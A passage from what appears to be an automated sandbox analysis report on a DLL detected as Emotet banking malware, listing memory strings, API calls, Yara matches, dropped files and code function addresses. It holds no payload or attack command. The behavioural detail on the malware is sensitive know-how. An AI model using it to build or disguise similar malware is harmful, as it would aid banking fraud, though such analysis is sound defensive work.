","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Ca equals www.facebook.com (Facebook)
                      Source: svchost.exe, 00000016.00000003.635673341.00000228C5988000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify - Music and Podcasts","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"ProductId":"9NCBCSZSJRSB","Properties":{"FulfillmentData":{"ProductId":"9NCBCSZSJRSB","WuCategoryId":"5c353b9c-7ac7-4d27-af07-923e7d9aa2e2","PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","SkuId":"0010"},"FulfillmentType":"WindowsUpdate","FulfillmentPluginId":null,"Packages":[{"Applications":[{"ApplicationId":"Spotify"}],"Architectures":["x86"],"Ca equals www.twitter.com (Twitter)
                      Source: svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000016.00000002.683376230.00000228C5900000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                      Source: regsvr32.exe, 00000006.00000002.896968983.00000000032D3000.00000004.00000020.00020000.00000000.sdmp, regsvr32.exe, 00000006.00000003.499973527.00000000032D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/
                      Source: 77EC63BDA74BD0D0E0426DC8F80085060.6.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
                      Source: regsvr32.exe, 00000006.00000003.499011237.0000000005683000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab?053f60a558195
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://support.hotspotshield.com/
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 00000016.00000003.659235630.00000228C59BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.hotspotshield.com/terms/
                      Source: svchost.exe, 00000016.00000003.654146864.00000228C59AB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654473366.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654325113.00000228C59BC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654425192.00000228C5E02000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654134486.00000228C599A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654367737.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000016.00000003.654405514.00000228C5E1A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.pango.co/privacy
                      Source: svchost.exe, 00000016.00000003.662945656.00000228C599A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3F766 InternetReadFile,6_2_04D3F766
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,2_2_10032A2D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1003437E GetKeyState,GetKeyState,GetKeyState,2_2_1003437E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,2_2_1002FE1B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_10032A2D GetKeyState,GetKeyState,GetKeyState,GetFocus,GetDesktopWindow,SendMessageA,SendMessageA,GetParent,3_2_10032A2D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1003437E GetKeyState,GetKeyState,GetKeyState,3_2_1003437E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1002FE1B ScreenToClient,GetKeyState,GetKeyState,GetKeyState,KillTimer,IsWindow,3_2_1002FE1B

                      E-Banking Fraud

                      barindex
                      Yara detected Emotet
                      Source: Yara matchFile source: 4.2.rundll32.exe.e20000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.41d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.dd0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3190000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.eb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.eb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.dd0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.4d30000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e20000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e20000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.41d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.regsvr32.exe.3190000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.e50000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.regsvr32.exe.4200000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.4870000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.388781542.0000000000E51000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.383767887.0000000000EB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.384631851.0000000000DD0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.388750186.0000000000E20000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.897035538.0000000004D31000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.896680035.0000000003190000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.384673392.0000000000E21000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.387530383.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.387558358.0000000004201000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.384161260.0000000004871000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: l2sFDHB0lp.dllStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LINE_NUMS_STRIPPED
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile deleted: C:\Windows\SysWOW64\Tqddippvufllrd\rwkkp.rhz:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Tqddippvufllrd\Jump to behavior
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1001409B2_2_1001409B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_100239732_2_10023973
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 2_2_1000DB7F2_2_1000DB7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1001409B3_2_1001409B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_100239733_2_10023973
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_1000DB7F3_2_1000DB7F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E33EE64_2_00E33EE6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E256AD4_2_00E256AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E37EB94_2_00E37EB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3FC6F4_2_00E3FC6F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2C26D4_2_00E2C26D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3DC5F4_2_00E3DC5F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E26C5E4_2_00E26C5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3202D4_2_00E3202D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E29DE04_2_00E29DE0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E385A74_2_00E385A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E295874_2_00E29587
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2E51F4_2_00E2E51F
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2D8E04_2_00E2D8E0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E286ED4_2_00E286ED
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3A0F34_2_00E3A0F3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E22EF64_2_00E22EF6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E360FA4_2_00E360FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E324F94_2_00E324F9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3D8FE4_2_00E3D8FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E332C54_2_00E332C5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2CED34_2_00E2CED3
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3D6A74_2_00E3D6A7
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3B0A44_2_00E3B0A4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E242B24_2_00E242B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3E4B24_2_00E3E4B2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E254B94_2_00E254B9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E356894_2_00E35689
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2F88D4_2_00E2F88D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E340934_2_00E34093
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3169D4_2_00E3169D
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3BA7C4_2_00E3BA7C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E346584_2_00E34658
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3F05E4_2_00E3F05E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3B45C4_2_00E3B45C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E230234_2_00E23023
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3C2344_2_00E3C234
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2A2034_2_00E2A203
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2260B4_2_00E2260B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E24A114_2_00E24A11
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2E2144_2_00E2E214
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3001B4_2_00E3001B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3481A4_2_00E3481A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3CBE54_2_00E3CBE5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E23FE54_2_00E23FE5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E237FA4_2_00E237FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E359FA4_2_00E359FA
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3F7FE4_2_00E3F7FE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2A7C44_2_00E2A7C4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E219C84_2_00E219C8
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E31DCF4_2_00E31DCF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2A9D24_2_00E2A9D2
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2D5D64_2_00E2D5D6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E291D64_2_00E291D6
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E353D54_2_00E353D5
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E29BDE4_2_00E29BDE
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2FBDD4_2_00E2FBDD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E28DA44_2_00E28DA4
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E375AD4_2_00E375AD
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3FFAC4_2_00E3FFAC
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3BDB04_2_00E3BDB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E38FB04_2_00E38FB0
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E32FB94_2_00E32FB9
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E301BF4_2_00E301BF
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2DB9B4_2_00E2DB9B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E25D994_2_00E25D99
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E38D6C4_2_00E38D6C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E36F794_2_00E36F79
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2E9424_2_00E2E942
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3E9474_2_00E3E947
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2BB444_2_00E2BB44
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3BF4C4_2_00E3BF4C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E30F574_2_00E30F57
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E35D5E4_2_00E35D5E
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E405594_2_00E40559
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E21D5C4_2_00E21D5C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E34D2B4_2_00E34D2B
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2A5284_2_00E2A528
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2593C4_2_00E2593C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E2B7044_2_00E2B704
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3630A4_2_00E3630A
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3E10C4_2_00E3E10C
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E337114_2_00E33711
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E33B174_2_00E33B17
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E379154_2_00E37915
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00E3E71C4_2_00E3E71C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D432C56_2_04D432C5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4A0F36_2_04D4A0F3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D43EE66_2_04D43EE6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3D8E06_2_04D3D8E0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4169D6_2_04D4169D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D342B26_2_04D342B2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4E4B26_2_04D4E4B2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D47EB96_2_04D47EB9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D356AD6_2_04D356AD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4B45C6_2_04D4B45C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4DC5F6_2_04D4DC5F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D36C5E6_2_04D36C5E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3E2146_2_04D3E214
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3A9D26_2_04D3A9D2
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D391D66_2_04D391D6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D39BDE6_2_04D39BDE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D337FA6_2_04D337FA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4CBE56_2_04D4CBE5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D39DE06_2_04D39DE0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3DB9B6_2_04D3DB9B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D35D996_2_04D35D99
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D395876_2_04D39587
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D42FB96_2_04D42FB9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D31D5C6_2_04D31D5C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D48D6C6_2_04D48D6C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3CED36_2_04D3CED3
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D32EF66_2_04D32EF6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4D8FE6_2_04D4D8FE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D424F96_2_04D424F9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D460FA6_2_04D460FA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D386ED6_2_04D386ED
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D440936_2_04D44093
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D456896_2_04D45689
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3F88D6_2_04D3F88D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D354B96_2_04D354B9
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4B0A46_2_04D4B0A4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4D6A76_2_04D4D6A7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4F05E6_2_04D4F05E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D446586_2_04D44658
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4BA7C6_2_04D4BA7C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4FC6F6_2_04D4FC6F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3C26D6_2_04D3C26D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D34A116_2_04D34A11
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4481A6_2_04D4481A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4001B6_2_04D4001B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3A2036_2_04D3A203
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3260B6_2_04D3260B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4C2346_2_04D4C234
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D330236_2_04D33023
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4202D6_2_04D4202D
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D453D56_2_04D453D5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3D5D66_2_04D3D5D6
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3FBDD6_2_04D3FBDD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3A7C46_2_04D3A7C4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D319C86_2_04D319C8
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D41DCF6_2_04D41DCF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4F7FE6_2_04D4F7FE
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D459FA6_2_04D459FA
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D33FE56_2_04D33FE5
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4BDB06_2_04D4BDB0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D48FB06_2_04D48FB0
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D401BF6_2_04D401BF
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D485A76_2_04D485A7
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D38DA46_2_04D38DA4
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4FFAC6_2_04D4FFAC
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D475AD6_2_04D475AD
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D40F576_2_04D40F57
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D45D5E6_2_04D45D5E
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D505596_2_04D50559
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3E9426_2_04D3E942
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4E9476_2_04D4E947
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3BB446_2_04D3BB44
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4BF4C6_2_04D4BF4C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D46F796_2_04D46F79
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D479156_2_04D47915
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D43B176_2_04D43B17
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D437116_2_04D43711
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4E71C6_2_04D4E71C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3E51F6_2_04D3E51F
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3B7046_2_04D3B704
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4E10C6_2_04D4E10C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D4630A6_2_04D4630A
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3593C6_2_04D3593C
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D3A5286_2_04D3A528
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 6_2_04D44D2B6_2_04D44D2B
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10011BF0 appears 110 times
                      Source: C:\Windows\SysWOW64\regsvr32.exeCode function: String function: 10012514 appears 40 times
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 10011BF0 appears 110 times
